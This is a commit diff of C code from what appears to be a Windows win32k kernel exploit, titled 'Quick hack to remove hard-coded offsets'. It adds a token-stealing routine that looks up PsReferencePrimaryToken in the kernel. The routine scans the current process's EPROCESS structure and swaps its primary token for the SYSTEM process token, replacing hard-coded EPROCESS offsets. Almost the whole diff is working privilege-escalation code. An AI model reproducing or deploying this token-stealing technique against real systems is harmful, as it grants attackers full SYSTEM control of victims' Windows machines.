Quick hack to remove hard-coded offsets
parent
a6467f49ec
commit
b291d41b76
|
@ -70,7 +70,13 @@ pUser32_ClientCopyImage g_originalCCI = NULL;
|
|||
PVOID g_ppCCI = NULL, g_w32theadinfo = NULL;
|
||||
int g_shellCalled = 0;
|
||||
DWORD g_OurPID;
|
||||
DWORD g_EPROCESS_TokenOffset = 0;
|
||||
|
||||
|
||||
typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
|
||||
_Inout_ PVOID Process
|
||||
);
|
||||
|
||||
lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
|
||||
|
||||
typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation );
|
||||
|
||||
|
@ -272,6 +278,9 @@ ULONG_PTR GetPsLookupProcessByProcessId(
|
|||
break;
|
||||
}
|
||||
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
|
||||
pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
|
||||
|
||||
FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
|
||||
FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
|
||||
|
||||
|
@ -329,6 +338,36 @@ HWND GetFirstThreadHWND(
|
|||
return 0;
|
||||
}
|
||||
|
||||
// Search the specified data structure for a member with CurrentValue.
|
||||
BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
|
||||
{
|
||||
DWORD_PTR dwIndex, dwMask;
|
||||
|
||||
// Microsoft QWORD aligns object pointers, then uses the lower three
|
||||
// bits for quick reference counting.
|
||||
#ifdef _M_X64
|
||||
dwMask = ~0xf;
|
||||
#else
|
||||
dwMask = ~7;
|
||||
#endif
|
||||
// dwMask out the reference count.
|
||||
dwCurrentValue &= dwMask;
|
||||
|
||||
// Scan the structure for any occurrence of dwCurrentValue.
|
||||
for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++)
|
||||
{
|
||||
if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue)
|
||||
{
|
||||
// And finally, replace it with NewValue.
|
||||
pdwStructure[dwIndex] = dwNewValue;
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
||||
// Member not found.
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
/*
|
||||
* StealProcessToken
|
||||
*
|
||||
|
@ -349,9 +388,14 @@ NTSTATUS NTAPI StealProcessToken(
|
|||
if (NT_SUCCESS(Status)) {
|
||||
Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
|
||||
if (NT_SUCCESS(Status)) {
|
||||
if (g_EPROCESS_TokenOffset) {
|
||||
*(PVOID *)((PBYTE)CurrentProcess + g_EPROCESS_TokenOffset) = *(PVOID *)((PBYTE)SystemProcess + g_EPROCESS_TokenOffset);
|
||||
}
|
||||
PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
|
||||
PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
|
||||
|
||||
// Find the token in the target process, and replace with the system token.
|
||||
find_and_replace_member((PDWORD_PTR)CurrentProcess,
|
||||
(DWORD_PTR)targetToken,
|
||||
(DWORD_PTR)systemToken,
|
||||
0x200);
|
||||
}
|
||||
}
|
||||
return Status;
|
||||
|
@ -436,13 +480,6 @@ void win32k_client_copy_image(LPVOID lpPayload)
|
|||
g_OurPID = GetCurrentProcessId();
|
||||
g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
|
||||
|
||||
#ifdef _WIN64
|
||||
g_EPROCESS_TokenOffset = 0x208;
|
||||
#else
|
||||
g_EPROCESS_TokenOffset = 0xF8;
|
||||
#endif
|
||||
|
||||
|
||||
if (g_PsLookupProcessByProcessIdPtr == NULL) {
|
||||
ExitProcess((UINT)-3);
|
||||
return;
|
||||
|
|